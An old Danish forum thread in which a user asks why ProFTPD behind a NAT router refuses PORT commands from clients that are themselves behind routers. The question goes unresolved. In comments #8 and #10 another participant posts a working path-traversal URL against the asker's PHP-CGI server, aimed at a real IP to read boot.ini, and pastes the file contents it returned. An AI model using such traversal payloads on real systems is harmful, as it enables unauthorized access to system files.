Avatar billede nyhjem Nybegynder
09. august 2002 - 16:48 Der er 13 kommentarer og
1 løsning

ProFTPD Refused PORT :/

Hejsa.

Jeg har netop sat en server op med proftpd med mysql og quotatab_sql understøttelse.

Serveren står på et netværk bag en router, og kører med IP nummeret 192.168.1.6.

Alt virker som det skal. Når jeg logger ind fra en computer på samme netværk som serveren kan jeg fint komme igennem.

Logger jeg på fra en maskine ude i byen med eksternt IP nummer ( altså en klient maskine der ikke sidder bag nogen form for router/firewall f.eks. en modem opkobling ) virker det også fint, men prøver jeg fra en maskine, der sidder bag en router går login routinen istå når klienten prøver at lave LIST kommandoen.
Dette problem har jeg haft før, og der hjalp det hvis jeg satte PASSIVE mode til på klienten. Det hjælper bare ikke denne gang.
Prøver jeg det for jeg følgende fejl:
filserver.ironwall.dk (213.237.71.65.adsl.amb.worldonline.dk[213.237.71.65]) - dispatching CMD command 'PORT 192,168,1,77,6,2' to mod_core
filserver.ironwall.dk (213.237.71.65.adsl.amb.worldonline.dk[213.237.71.65]) - Refused PORT 192,168,1,77,6,2 (address mismatch).

Jeg kan af fejlen tyde at proftpd brokker sig over forskellen mellem klientes lokale IP nummer og dennes eksterne IP nummer.

Hvordan undgår jeg denne fejl?

Har søgt flere steder på nettet og kan se at der er temmelig mange som har haft dette problem, men ingen har fået det løst :/

/Martin
Avatar billede fiskerendk Nybegynder
09. august 2002 - 16:53 #1
nyhjem er du klar over var farlig en opsætning du har på din server??
Avatar billede nyhjem Nybegynder
09. august 2002 - 16:54 #2
Fisk >> Nø :)

Har bare fundet de moduler, som passede til mine behov og brugt dem :)

Hvad er der galt da?
Avatar billede fiskerendk Nybegynder
09. august 2002 - 16:56 #3
prøv at få en til at scanne din server med en Security program så skal du se løjer hehe.. jeg siger det bar at det er en god ide at få tjekket!
Avatar billede nyhjem Nybegynder
09. august 2002 - 16:57 #4
Hmm*S* Hvis det er 213.237.71.65 du har scannet så er det altså ikke mig*G*

De åbne porte hos mig er:
*S*
Og de to sidste bliver nedlagt hurtigst muligt*S*
Avatar billede nyhjem Nybegynder
09. august 2002 - 16:58 #5
Hm.. og så os lige 110.. havde jeg glemt*gs*
Avatar billede fiskerendk Nybegynder
09. august 2002 - 16:59 #6
ip er: 80.196.159.211

men jeg har ik scannet dig.. jeg siger bar du måske skulle få en til at gøre det.. man må ik service scanne i danmark det er ulovligt så derfor har jeg ik gjort men siger bar du skulle få nogle til det!
Avatar billede nyhjem Nybegynder
09. august 2002 - 17:00 #7
Hmm.. hvordan kan du så vide at min opsætning er super farlig?*forvirret*
Avatar billede fiskerendk Nybegynder
09. august 2002 - 17:02 #8
hehe sådan noget ved jeg bar hehe..!

prøv engang at gå idin browser og skriv http://80.196.159.211///php/php.exe?C:\boot.ini
Avatar billede nyhjem Nybegynder
09. august 2002 - 17:04 #9
No input file specified. <-- Reply*S

Men det gør nu heller ikke så meget hvis der er nogen, som slagter den server*S* Den bliver lukket ned i løbet af weekenden :)
Den ny server står på samme IP, men med 8080 som port indtil den anden bli'r slukket*S*

Derfor jeg skal have lidt hjælp til at komme uden om det der proftpd problem jeg skrev om :)
Avatar billede fiskerendk Nybegynder
09. august 2002 - 17:07 #10
heh ok men fejlen er altså [boot loader] timeout=0 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect C:\="Previous Operating System on C:"
Avatar billede nyhjem Nybegynder
09. august 2002 - 17:09 #11
Det gør nu heller ikke så meget :)

Mit egentlig problem var jo sådan set proftpd :)
Avatar billede fiskerendk Nybegynder
09. august 2002 - 17:09 #12
forresten hvad port connecter du til på FTP'en i dit spørgsmål?
Avatar billede nyhjem Nybegynder
09. august 2002 - 17:19 #13
Damn.. eksperten døede lige og åd mit spørgsmål :/

Serveren kører på port 21 internt, 2121 eksternt. Der bliver altså masquradet for at nå serveren*S*

Men det burde virker alligevel, da klienter som IKKE sidder bag firewall/router sagtens kan logge ind :/
Avatar billede nyhjem Nybegynder
23. november 2005 - 15:55 #14
denne tråd er vidst ikke længere aktiv, så jeg lukker den hermed :)